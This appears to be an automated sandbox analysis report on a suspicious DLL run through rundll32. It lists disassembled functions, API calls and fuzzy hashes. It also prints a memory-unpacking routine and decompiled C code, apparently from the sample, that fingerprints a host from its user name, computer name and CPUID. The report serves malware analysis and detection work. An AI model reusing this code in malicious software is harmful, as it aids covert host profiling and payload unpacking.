_free.LIBCMT ref: 6DDF2F0F
_free.LIBCMT ref: 6DDF2F21
_free.LIBCMT ref: 6DDF2F32
_free.LIBCMT ref: 6DDF2F3D
_free.LIBCMT ref: 6DDF2F61
RtlEncodePointer.NTDLL(6DEB1328), ref: 6DDF2F68
_free.LIBCMT ref: 6DDF2F7D
_free.LIBCMT ref: 6DDF2F93
_free.LIBCMT ref: 6DDF2FBB

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: 7182866ccfe7459937b2f109a705405a4c92f4e9677c61dc83390a343603206f
Instruction ID: 1c007b3b1be430354f2ba3d1cf3c7ecd09d0a6c3610c928f1dfd84ef5924dca0
Opcode Fuzzy Hash: 7182866ccfe7459937b2f109a705405a4c92f4e9677c61dc83390a343603206f
Instruction Fuzzy Hash: 86215136905792CBDB21BFA5DA447653BF4EF0A778353002EF948D7280DB34B845CA96

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE5410, Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 436COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 6DDE54E2
_localeconv.LIBCMT ref: 6DDE54F8
_strcspn.LIBCMT ref: 6DDE552F
std::ios_base::getloc.LIBCPMTD ref: 6DDE5544
ctype.LIBCPMTD ref: 6DDE558B
ctype.LIBCPMTD ref: 6DDE55CA
std::ios_base::getloc.LIBCPMTD ref: 6DDE55D9
_Mpunct.LIBCPMTD ref: 6DDE561C
std::ios_base::width.LIBCPMTD ref: 6DDE5907

Strings

@, xrefs: 6DDE579C

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: _strcspnctypestd::ios_base::getloc$Mpunct_localeconvstd::ios_base::width
String ID: @
API String ID: 484443084-2766056989
Opcode ID: 2577b05be2d452fd8e19def5210cbd388930e30312cd85c4c6850a41d2946505
Instruction ID: 427adce6f9feaef8cd2ce3ece5dd082ba9a5f298a693825922255ff3e355eaa0
Opcode Fuzzy Hash: 2577b05be2d452fd8e19def5210cbd388930e30312cd85c4c6850a41d2946505
Instruction Fuzzy Hash: A1024AB1904259DFCB04DF98C890FEEBBB5BF88344F148159F519AB291D734AA41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE9B5B, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDE9B62
std::_Lockit::_Lockit.LIBCPMT ref: 6DDE9B6C

Part of subcall function 6DDE9205: __lock.LIBCMT ref: 6DDE9216

int.LIBCPMTD ref: 6DDE9B83

Part of subcall function 6DDE4660: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE4676

codecvt.LIBCPMT ref: 6DDE9BA6
std::bad_exception::bad_exception.LIBCMT ref: 6DDE9BBA
__CxxThrowException@8.LIBCMT ref: 6DDE9BC8
std::_Facet_Register.LIBCPMT ref: 6DDE9BDE

Strings

bad cast, xrefs: 6DDE9BB2

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1512642153-3145022300
Opcode ID: fd4584a3d2ad2f6d63c1c0b899b0736963f6d11f5a8310a99cba4caee2b9c167
Instruction ID: 248d7f70eb776da9705ff6a767049ccdcf97e4040ea2d87886a862baf397034c
Opcode Fuzzy Hash: fd4584a3d2ad2f6d63c1c0b899b0736963f6d11f5a8310a99cba4caee2b9c167
Instruction Fuzzy Hash: A0016D32919229DBCF01FBA4C940AEE7775BF457A8F520219F614AB290DF34AA04C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE3120, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DDE314A

Part of subcall function 6DDE9205: __lock.LIBCMT ref: 6DDE9216

int.LIBCPMTD ref: 6DDE3163

Part of subcall function 6DDE4660: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE4676

Strings

bad cast, xrefs: 6DDE31A5

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$__lock
String ID: bad cast
API String ID: 172949856-3145022300
Opcode ID: 20f409384e1fe225cd2ca329a3454cc2caa9d590dd4f60e0ed9409eebe07abf3
Instruction ID: ab1dad3940873c6a0b0893b5214e162abf470d60e5bd31fe5eb4232d5f86cbaf
Opcode Fuzzy Hash: 20f409384e1fe225cd2ca329a3454cc2caa9d590dd4f60e0ed9409eebe07abf3
Instruction Fuzzy Hash: B6310AB1D14209DFCB04DFA9C981AFEBBB5FB49354F104669E525A7390DB34AA00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE3220, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6DDE324A

Part of subcall function 6DDE9205: __lock.LIBCMT ref: 6DDE9216

int.LIBCPMTD ref: 6DDE3263

Part of subcall function 6DDE4660: std::_Lockit::_Lockit.LIBCPMT ref: 6DDE4676

Strings

bad cast, xrefs: 6DDE32A5

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: LockitLockit::_std::_$__lock
String ID: bad cast
API String ID: 172949856-3145022300
Opcode ID: cc63de93f43cc173ba30ad9e4c92ca652ea0d45de07ef542d79b37c306d7a07d
Instruction ID: 41891caf507fc1e5ccdffb7cd97f1ee4170a23a313634b8bb603dd3f44ddc9d0
Opcode Fuzzy Hash: cc63de93f43cc173ba30ad9e4c92ca652ea0d45de07ef542d79b37c306d7a07d
Instruction Fuzzy Hash: 25311CB1D14209DFCB04DFA8C981EFEBBB4FB49354F104629E525A7390DB346A00CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE6320, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 352COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6DDE63D8
ctype.LIBCPMTD ref: 6DDE6447
std::ios_base::getloc.LIBCPMTD ref: 6DDE6453
_Mpunct.LIBCPMTD ref: 6DDE6487
std::ios_base::width.LIBCPMTD ref: 6DDE66EE

Strings

@, xrefs: 6DDE6583

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: std::ios_base::getloc$Mpunctctypestd::ios_base::width
String ID: @
API String ID: 2441703863-2766056989
Opcode ID: e93665f70b4bf84dbde663e0cb9b3d956b47a8022b786d73ca5cd67be8054e1f
Instruction ID: 94a7b437cbc1589e09f3b3b5d918430e72d04a0303b10469fb1ecef0deeacedb
Opcode Fuzzy Hash: e93665f70b4bf84dbde663e0cb9b3d956b47a8022b786d73ca5cd67be8054e1f
Instruction Fuzzy Hash: 19E15BB1A04248DFCB04DF94C990BEEBBB5BF48344F14865DF61AAB251D734AD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE2490, Relevance: 10.8, APIs: 7, Instructions: 299COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6DDE24C7
std::ios_base::getloc.LIBCPMTD ref: 6DDE259F
char_traits.LIBCPMTD ref: 6DDE266F
ctype.LIBCPMTD ref: 6DDE26C9
char_traits.LIBCPMTD ref: 6DDE270F
char_traits.LIBCPMTD ref: 6DDE27AD
std::ios_base::width.LIBCPMTD ref: 6DDE27DD

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: char_traits$_strlenctypestd::ios_base::getlocstd::ios_base::width
String ID:
API String ID: 2376101104-0
Opcode ID: 8e21c28fef35dacbe8b50eb64292d5c4827fbd1c342b3d380dfce6ae57a6a13f
Instruction ID: 8f66b69915f7fd180045d4c070f51d799ce27efb90b0af99dab2d99a528fbbe4
Opcode Fuzzy Hash: 8e21c28fef35dacbe8b50eb64292d5c4827fbd1c342b3d380dfce6ae57a6a13f
Instruction Fuzzy Hash: ACD10B74D0420ADFDB14EFA4C990BEEBBB1FF88388F108119E545AB355D735AA41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF4A63, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__mtinitlocks.LIBCMT ref: 6DDF4A68
__mtterm.LIBCMT ref: 6DDF4A71
__calloc_crt.LIBCMT ref: 6DDF4A96
__initptd.LIBCMT ref: 6DDF4AB8
GetCurrentThreadId.KERNEL32 ref: 6DDF4ABF

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
String ID:
API String ID: 2314865971-0
Opcode ID: 972b2eefd4af8ccd8bf437f380dcb03d09ba9d7a209f1db9dd0c40c0630955fe
Instruction ID: 27c893a1bff21948c8f465d9918c3b60b8780eecddb2c90e4848690889a52119
Opcode Fuzzy Hash: 972b2eefd4af8ccd8bf437f380dcb03d09ba9d7a209f1db9dd0c40c0630955fe
Instruction Fuzzy Hash: F9F0CD3350C2125AE634BBB47E0276A3AE4CF0627CF23461AF264D81C0FF21946281A8

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE93DF, Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

____lc_codepage_func.LIBCMT ref: 6DDE93E3
__calloc_crt.LIBCMT ref: 6DDE93F4

Part of subcall function 6DDEE636: __calloc_impl.LIBCMT ref: 6DDEE645

___pctype_func.LIBCMT ref: 6DDE9407
_memmove.LIBCMT ref: 6DDE9410
___pctype_func.LIBCMT ref: 6DDE9421
____lc_locale_name_func.LIBCMT ref: 6DDE942D

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
String ID:
API String ID: 1321936363-0
Opcode ID: 0b12a6c85c3823f9fe54b973dc0ee881f81ccf6a026ce376c485335014c0b3a4
Instruction ID: 565f323fe3f85f005d44ca7427d40efd7504018b97b9bbd318cf557e2dc005fb
Opcode Fuzzy Hash: 0b12a6c85c3823f9fe54b973dc0ee881f81ccf6a026ce376c485335014c0b3a4
Instruction Fuzzy Hash: 0CF096B19087019FE710BFA5D805B1AB7D8EF80794F01C82DF699CB681EF74E4408B64

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF82CC, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6DDF82D8

Part of subcall function 6DDEB1C8: __FF_MSGBANNER.LIBCMT ref: 6DDEB1DF
Part of subcall function 6DDEB1C8: __NMSG_WRITE.LIBCMT ref: 6DDEB1E6
Part of subcall function 6DDEB1C8: RtlAllocateHeap.NTDLL(6DEB134C,00000000,00000001), ref: 6DDEB20B

_free.LIBCMT ref: 6DDF82EB

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: b14d55694526691dee6466597b1de82859f6aee0dba6228ca3b60f005c959631
Instruction ID: 971f998545de470d015d901b9c9191ca0bfeabdf4b6b343abb2376cd20e8dc4f
Opcode Fuzzy Hash: b14d55694526691dee6466597b1de82859f6aee0dba6228ca3b60f005c959631
Instruction Fuzzy Hash: AB110A7250C617DBDF123FB6D8047593BE8AF053B4B138529FA88D6260DB319452C666

Uniqueness

Uniqueness Score: -1.00%

Function 6DDFEB33, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6DDFEB4A
_wcscmp.LIBCMT ref: 6DDFEB5B

Strings

ACP, xrefs: 6DDFEB44
OCP, xrefs: 6DDFEB55

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: _wcscmp
String ID: ACP$OCP
API String ID: 856254489-711371036
Opcode ID: 5fe1308f9aebf1fb0fe55e38a9af71023aba41052545ea96e8446d416fdbbc8e
Instruction ID: 816544797cc36cf95f56a1ccca3ebb8d92159a028f131086055575560826d2ba
Opcode Fuzzy Hash: 5fe1308f9aebf1fb0fe55e38a9af71023aba41052545ea96e8446d416fdbbc8e
Instruction Fuzzy Hash: 6B01B932649516F6EB11BB58DC41FEA37AC9F05769F068015FE09DB282FB30E64283E5

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE2860, Relevance: 6.3, APIs: 4, Instructions: 253COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 6DDE2897
char_traits.LIBCPMTD ref: 6DDE29F7
char_traits.LIBCPMTD ref: 6DDE2AE1
std::ios_base::width.LIBCPMTD ref: 6DDE2B11

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: char_traits$std::ios_base::width
String ID:
API String ID: 735177774-0
Opcode ID: 81d353eff2b1f1907416a45032abed1993d0fcf314a7e5e592fb211fcb4718aa
Instruction ID: b66da86c26f2f7ace4482409de7a3fb8b66d7ab1b411e79a6c8390a9a49b9f4b
Opcode Fuzzy Hash: 81d353eff2b1f1907416a45032abed1993d0fcf314a7e5e592fb211fcb4718aa
Instruction Fuzzy Hash: CEB1F974D04209EFDB28DF99C990BAEBBB2FF88348F108119E505AB355D731AE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE8000, Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

std::ios_base::getloc.LIBCPMTD ref: 6DDE807C
_Mpunct.LIBCPMTD ref: 6DDE80D0

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: Mpunctstd::ios_base::getloc
String ID:
API String ID: 76177404-0
Opcode ID: d179762983805596437e6c2500111ddd50f6a711874581487a56ce70f321d0ec
Instruction ID: 663e63ec73c8477310e693d1b51a56543192db5a66e951537c59af6c76331e41
Opcode Fuzzy Hash: d179762983805596437e6c2500111ddd50f6a711874581487a56ce70f321d0ec
Instruction Fuzzy Hash: 4971FDB1D04118DFCB14EFA5D890AEEB7B5BF48354F11811DF619AB291DB30A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE9512, Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6DDE956A
MultiByteToWideChar.KERNEL32(6DDE2D3A,00000009,?,00000002,00000000,00000000), ref: 6DDE95B8
MultiByteToWideChar.KERNEL32(6DDE2D3A,00000009,00000001,8BFC458B,00000000,00000000), ref: 6DDE962E
MultiByteToWideChar.KERNEL32(6DDE2D3A,00000009,00000001,00000001,00000000,00000000), ref: 6DDE9656

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: ByteCharMultiWide$Getcvt
String ID:
API String ID: 3195005509-0
Opcode ID: a9ca6453f2cf245866bd2b797be134d41e4d4216538f835cd32ed738df821bae
Instruction ID: 04d3f8bbd18eff02ef26646b974261f6777348ec947db35a4a1917349f69b785
Opcode Fuzzy Hash: a9ca6453f2cf245866bd2b797be134d41e4d4216538f835cd32ed738df821bae
Instruction Fuzzy Hash: F841E431A16346EFDB129F68D840BAB7BF9BF42390F118429F8619B181D771D854CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEEF8B, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6DDEF021
__flush.LIBCMT ref: 6DDEF041
__write.LIBCMT ref: 6DDEF074
__flsbuf.LIBCMT ref: 6DDEF0A2

Part of subcall function 6DDEE791: __getptd_noexit.LIBCMT ref: 6DDEE791

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 68325089c4cc5d4c7e068de3ce2e56d884387ac5d5f90d0dd688e5e7e7a9a207
Instruction ID: 8e39d28700eb09bed86e6ebe4c8c4c35a396335770e94069950bc0e9f875cd29
Opcode Fuzzy Hash: 68325089c4cc5d4c7e068de3ce2e56d884387ac5d5f90d0dd688e5e7e7a9a207
Instruction Fuzzy Hash: A9411671704707DBEB08AFB9D890AAEB7B6EF853A0B10813DF454C7280D771D9458750

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF9842, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6DDF9878
__isleadbyte_l.LIBCMT ref: 6DDF98A6
MultiByteToWideChar.KERNEL32(00000080,00000009,6DDF5423,00000001,00000000,00000000,?,00000000), ref: 6DDF98D4
MultiByteToWideChar.KERNEL32(00000080,00000009,6DDF5423,00000001,00000000,00000000,?,00000000), ref: 6DDF990A

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a216e880e1291bea9c85eae21f1591e65de1059c2a50817309eb1d3f7d5b96dd
Instruction ID: fa94fde0c72c4d95d17463cff4d7016ecd8fb0cca7ec8db14e71b9521cb45794
Opcode Fuzzy Hash: a216e880e1291bea9c85eae21f1591e65de1059c2a50817309eb1d3f7d5b96dd
Instruction Fuzzy Hash: 3F319C31E04246EBDB12AF75C844BBE7BB9BF41314F138929F8648B191D731D852DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF6CFE, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6DDF6D22

Part of subcall function 6DDF7409: __fltout2.LIBCMT ref: 6DDF7432

__cftog_l.LIBCMT ref: 6DDF6D48
__cftoe_l.LIBCMT ref: 6DDF6D7A

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 12c5a2e8d1f8bed58598dcca5687e2d7545c6bbf63180a4d191739d339ce85d6
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 19014B3244424EFBCF126F94DC11CEE3F36BB19254B4A8415FA2859431D337CAB2AB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DDED309, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6DDED320

Part of subcall function 6DDED948: ___BuildCatchObjectHelper.LIBCMT ref: 6DDED97A
Part of subcall function 6DDED948: ___AdjustPointer.LIBCMT ref: 6DDED991

_UnwindNestedFrames.LIBCMT ref: 6DDED337
___FrameUnwindToState.LIBCMT ref: 6DDED349
CallCatchBlock.LIBCMT ref: 6DDED36D

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: 77e9ce4982eeffa73c95e3f9bac00cf9d2fbf83d4ade13bb3658eac0e05ddc5c
Instruction ID: 2e22bb7a135d4fedd460411e4d655c1b66999dc55bcc01aebb1ff677473d7cbb
Opcode Fuzzy Hash: 77e9ce4982eeffa73c95e3f9bac00cf9d2fbf83d4ade13bb3658eac0e05ddc5c
Instruction Fuzzy Hash: 4F01D732404109BBCF126F55CD00EEA7BBAEFC9798F154115FE5866121D736E461DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE78D0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6DDE7B4C

Strings

$, xrefs: 6DDE7970
$, xrefs: 6DDE7967

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$
API String ID: 233258989-233714265
Opcode ID: 4c13b2eb5b8c62805ec641d57826f0e85cc100c864bad3dee766ca7627b13046
Instruction ID: 2f60f649d2cb4fdf552321134351c267f520a8484e93d003b6f8746f4c7944d3
Opcode Fuzzy Hash: 4c13b2eb5b8c62805ec641d57826f0e85cc100c864bad3dee766ca7627b13046
Instruction Fuzzy Hash: D3817C71E0461DEEDB61DF68C850B9EB7B5BF46380F00C199E95DA7242EB348A81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE7BB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 6DDE7E10

Strings

$, xrefs: 6DDE7C50
$, xrefs: 6DDE7C47

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: swprintf
String ID: $$$
API String ID: 233258989-233714265
Opcode ID: 30550065f43e52211d47f6e53d90939366c55dddf1a3b4d3be5204d3cc948867
Instruction ID: 1b9c9275b44915c22fc76dceda96f7e17795dfd49c051302e77555f0f45f2fd6
Opcode Fuzzy Hash: 30550065f43e52211d47f6e53d90939366c55dddf1a3b4d3be5204d3cc948867
Instruction Fuzzy Hash: 6F816A71E0061DEFDB51DF68CC50BAEB7B4BF46384F008199E959A7242EB348985DF21

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE2270, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(000008C6,6DE1D058), ref: 6DDE2345

Strings

sto, xrefs: 6DDE2361
surfa, xrefs: 6DDE2377

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID: sto$surfa
API String ID: 1611563598-1510663320
Opcode ID: cdaa4dfe0ff4b35f935f02d31d4e4c137aae4e36f09b1ce54d46b12eb734b79d
Instruction ID: bc9b2156397abcbb7e6fe1a5462479b7161c8f6942de7797ea8e25372ce81c4c
Opcode Fuzzy Hash: cdaa4dfe0ff4b35f935f02d31d4e4c137aae4e36f09b1ce54d46b12eb734b79d
Instruction Fuzzy Hash: 47511AB4F0020ADBCB08DF68C982B6C77F9FB8B309B10815AE43597355E7349A55EB54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 452 Parent PID: 5484 rundll32.exeCOMMON

Executed Functions

Function 6DE1E2D8, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000008D2,00003000,00000040,000008D2,6DE1DD28), ref: 6DE1E395
VirtualAlloc.KERNEL32(00000000,000000BC,00003000,00000040,6DE1DD8A), ref: 6DE1E3CC
VirtualAlloc.KERNEL32(00000000,00014035,00003000,00000040), ref: 6DE1E42C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE1E462
VirtualProtect.KERNEL32(6DDC0000,00000000,00000004,6DE1E2B7), ref: 6DE1E567
VirtualProtect.KERNEL32(6DDC0000,00001000,00000004,6DE1E2B7), ref: 6DE1E58E
VirtualProtect.KERNEL32(00000000,?,00000002,6DE1E2B7), ref: 6DE1E65B
VirtualProtect.KERNEL32(00000000,?,00000002,6DE1E2B7,?), ref: 6DE1E6B1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6DE1E6CD

Memory Dump Source

Source File: 00000003.00000002.500853158.000000006DE1B000.00000040.00020000.sdmp, Offset: 6DE1B000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
Instruction ID: fcbceebaa2aaf4acc111f1c1385a3c4a4b8b7c3c818fe12f534c6510fa93657b
Opcode Fuzzy Hash: ea7051bcf577662ea71b9f4d64ee5b37725c0e97cf97417fba22f765f46f3abc
Instruction Fuzzy Hash: 41D15F722097019FDB21AF14CC88A71F7A5FF88710B1D4198ED299F75AD7B0A811EB74

Uniqueness

Uniqueness Score: -1.00%

Function 02A79135, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E02A79135(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x2a7d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E02A7A6CC( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x2a7d2a4 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x2a7d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E02A77306(_v8 + _v8, _t64);
							}
							HeapFree( *0x2a7d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x2a7d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E02A77306(_v8 + _v8, _t64);
						}
						HeapFree( *0x2a7d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}

0x02a79135
0x02a7913d
0x02a79141
0x02a79144
0x02a79149
0x02a7914b
0x02a79150
0x02a79150
0x02a79156
0x02a79158
0x02a79165
0x02a791c6
0x02a79167
0x02a7916c
0x02a79172
0x02a79177
0x02a79185
0x02a79189
0x02a79198
0x02a7919f
0x02a791a6
0x02a791a6
0x02a791b1
0x02a791b1
0x02a79189
0x02a79177
0x02a791c8
0x02a791ce
0x02a791d8
0x02a791da
0x02a791df
0x02a791ee
0x02a791f2
0x02a791fd
0x02a79204
0x02a7920b
0x02a7920b
0x02a79217
0x02a79217
0x02a791f2
0x02a79222
0x02a79224
0x02a79227
0x02a79229
0x02a7922c
0x02a7922f
0x02a79239
0x02a7923d
0x02a79241

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 02A7916C
RtlAllocateHeap.NTDLL(00000000,?), ref: 02A79183
GetUserNameW.ADVAPI32(00000000,?), ref: 02A79190
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02A75D20), ref: 02A791B1
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02A791D8
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 02A791EC
GetComputerNameW.KERNEL32(00000000,00000000), ref: 02A791F9
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,02A75D20), ref: 02A79217

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 6bd8540e5d52b149f1a7f3e964fd44ffbe870b95156b068eec19d302af43f016
Instruction ID: 629d51bce2f36c9f4c62e18b19e07c6fd9c00610864fb8dbe84c49b21225b756
